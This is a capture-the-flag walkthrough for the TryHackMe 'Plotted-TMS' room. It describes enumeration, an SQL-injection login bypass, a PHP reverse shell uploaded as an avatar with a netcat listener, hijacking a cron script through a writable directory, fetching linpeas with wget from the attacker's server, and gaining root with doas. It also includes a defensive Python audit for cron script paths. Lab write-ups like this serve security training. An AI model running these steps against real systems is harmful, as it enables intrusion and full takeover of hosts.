Description
Everything here is plotted!
https://tryhackme.com/room/plottedtms
Happy Hunting!
Tip: Enumeration is key!
Port scanning
nmap -p- -sS -T4 -A 10.81.183.25
Main website
Both sites, the one on port 80 and the other on port 445, present the default Apache page.
Directories enumeration
feroxbuster -u http://10.81.183.25:80 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
feroxbuster -u http://10.81.183.25:445 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
The most interesting file was id_rsa, present in the directory listing on port 80, but it turned out to be just a tip encoded in base64. The same goes for other juicy files like /passwd and /shadow.
On port 445 there is a /management website:
Login page http://10.81.183.25:445/management/admin/login.php
Bypassing authorization using SQL Injection
Login request is a POST to http://10.81.183.25:445/management/classes/Login.php?f=login with plaintext body: username=admin&password=admin
I used Burp Intruder with payloads from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Intruder/Auth_Bypass.txt to try to bypass authorization.
Unrestricted File Upload → Remote Code Execution
I started listening on my machine using nc -nlvp 1234.
Next, I uploaded php-reverse-shell.php as an avatar file and accessed the server as the www-data user.
Privilege escalation to plot_admin
There is a cron job executed every minute as plot_admin.
It runs the script /var/www/scripts/backup.sh
I don't have write permission on the backup.sh file, but the script copies everything from /var/www/html/management to /home/plot_admin/tms_backup and gives the copy 770 permissions.
I can't write to backup.sh itself, but I can write to the directory containing it.
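The weakness here is not the script but its parent directory: a file can be replaced when the directory is writable, however strict the file's own mode is. The following audit check is an added example, not part of the original writeup, for finding this on hosts you administer; the tree, uid 1001 for plot_admin and www-data ownership of /var/www/scripts are constructed assumptions.

```python
import os
import stat
from dataclasses import dataclass
from typing import Callable, List

@dataclass
class Entry:
    """Minimal stand-in for an os.stat() result: permission bits, owner uid, group gid."""
    mode: int
    uid: int
    gid: int

def entry_from_disk(path: str) -> Entry:
    """Build an Entry from a real path when auditing a live host."""
    st = os.stat(path)
    return Entry(stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)

def swappable_by_others(e: Entry, run_uid: int) -> bool:
    """True if someone other than root or the cron user can modify this component.
    A writable parent directory is enough: the script can be replaced even when
    the file itself is not writable."""
    if e.mode & (stat.S_IWGRP | stat.S_IWOTH):
        return True
    return e.uid not in (0, run_uid)

def audit_cron_script(script: str, run_uid: int,
                      lookup: Callable[[str], Entry]) -> List[str]:
    """Check the script and every parent directory; return those a third party could alter."""
    findings = []
    parts = script.strip("/").split("/")
    for i in range(1, len(parts) + 1):
        component = "/" + "/".join(parts[:i])
        if swappable_by_others(lookup(component), run_uid):
            findings.append(component)
    return findings

# Constructed sample tree mirroring the walkthrough: the cron job runs as
# plot_admin (uid 1001 is an assumption), backup.sh is root-owned and not
# writable, but its directory is owned and group-writable by www-data (33).
SAMPLE_TREE = {
    "/var": Entry(0o755, 0, 0),
    "/var/www": Entry(0o755, 0, 0),
    "/var/www/scripts": Entry(0o775, 33, 33),
    "/var/www/scripts/backup.sh": Entry(0o755, 0, 0),
}
# Same tree with the directory root-owned and not group-writable.
HARDENED_TREE = {**SAMPLE_TREE, "/var/www/scripts": Entry(0o755, 0, 0)}

def audit_sample(tree=SAMPLE_TREE) -> List[str]:
    return audit_cron_script("/var/www/scripts/backup.sh", 1001, tree.__getitem__)
```

On a live host, call audit_cron_script(path, uid, entry_from_disk) for each script referenced from crontabs and cron.d.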
I started listening on my kali linux machine using nc -nlvp 1235
Next, I created a script and replaced backup.sh with my script:
Exploiting doas with SUID bit set
I downloaded the linpeas.sh script to the target machine using wget:
I started a Python HTTP server on my Kali machine:
python3 -m http.server
and on target machine:
wget http://my-machine-ip:8000/linpeas.sh
It found doas with the SUID bit set. doas is a privilege escalation utility similar to sudo that allows users to execute commands as root. When doas is misconfigured or has the SUID bit set, an attacker can abuse overly permissive rules to execute arbitrary commands as root. This results in full privilege escalation.
I used it to read the flag in the root folder, but it can be used like: doas -u root /bin/sh